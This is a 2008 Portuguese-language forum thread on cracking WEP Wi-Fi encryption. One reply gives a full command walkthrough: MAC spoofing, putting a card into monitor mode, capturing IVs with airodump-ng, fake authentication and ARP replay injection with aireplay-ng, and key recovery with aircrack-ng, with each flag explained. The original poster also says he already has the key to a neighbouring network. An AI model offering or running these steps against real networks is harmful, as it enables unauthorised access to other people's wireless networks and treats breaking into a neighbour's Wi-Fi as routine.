Vencendo WEP

Iniciado por kohx, 25 de Dezembro , 2008, 05:24:06 PM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

kohx

Procedimento realizado com:

- Wifislax ( Considere que tenha o Madwifi instalado, pode ser qualquer distro Linux ou Live CD)
- Placa D-Link DWL-G520 rev/b - Chipset Atheros







Inté.

Stradivous


#phobia

Legal, mas além de já existirem zilhões de artigos e até vídeos ensinando isso, será que ainda encontramos WEP por aí?

Uma vez cheguei na varanda aqui de casa com o notebook, foi listado umas 15 redes e acreditem, nem uma WEP!  ::)


Abs.

Reeves

Citação de: #phobia online 26 de Dezembro , 2008, 11:58:28 PM
será que ainda encontramos WEP por aí?
Uma vez cheguei na varanda aqui de casa com o notebook, foi listado umas 15 redes e acreditem, nem uma WEP!  ::)
ok ok ok vou dar meu relato...
na minha área de alcanse hoje tem:
4 redes sem criptogrfia nenhuma(incluindo 1 provedor no meio)
5 redes caseiras usando WEP
e 3 com WPA2 Supplicant


o/
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

BRTINKER

WiFi Slax 3.1


1)Troque o MAC:
#ifconfig wlan0 down
#ifconfig wlan0 hw ether 00:11:22:33:44:55
#ifconfig wlan0 up

2) Coloque a placa em modo monitor
#wlanconfig wlan0 destroy
#modprobe -r wlan_pci
#modprobe wlan_pci autocreate=monitor

3)Captura de pacotes .ivs ( Vai precisar de pelo menos 130.000)
#airodump-ng --ivs -w wep --bssid 00:01:02:03:04:05 -c 11 wlan0
Onde:
-w = Entrada para nome do pacote
wep = Nome do pacote de captura (Pode ser qualquer nome)
--dssid = MAC do AP
-c = Canal do AP
wlan0 = Interface da placa

4) Autenticação falsa ( Para agilizar a captura )
#aireplay-ng -1 O -e nomedoAP -a 00:01:02:03:04:05 -h 00:02:AD:00:79:5E wlan0 Onde:
-1 = Autenticação falsa
0 =Tempo em segundos da reassociação
-e = Entrada do Nome do AP
-a = Mac do AP
-h = Mac do cliente

5) Rejeição de arp
aireplay-ng -3 -b 00:01:02:03:04:05 -h 00:02:AD:00:79:5E wlan0
Onde:
-3 = Repetição padrão do pedido do arp
-b = Mac do AP
-h = Mac do Cliente
wlan0 = Interface de rede

6) Descobrindo a WEP
#aircrack-ng -a 1 -0 -n 64 wep-01.iys
Onde:
-a Força modalidade de ataque
-1 - VVEP estática
-O = Aplica cores no aircrack
-n Específica o comprimento da Key ( 64, 128 ou 256 bits)
wep-01.iys = é o pacote que capturamos no iten 3

kohx

BRTINKER, Obrigado pela contribuição no post  ;)

Aqui na minha localidade tem 8 redes, 5 são fixas, fixa pq quando scan denovo (refresh) ai 3 saem de sinal.

Dessas 5, tenho acesso a 3 (uma no AP), 2 usam WEP e já tenho a chave de uma  ;D

Flws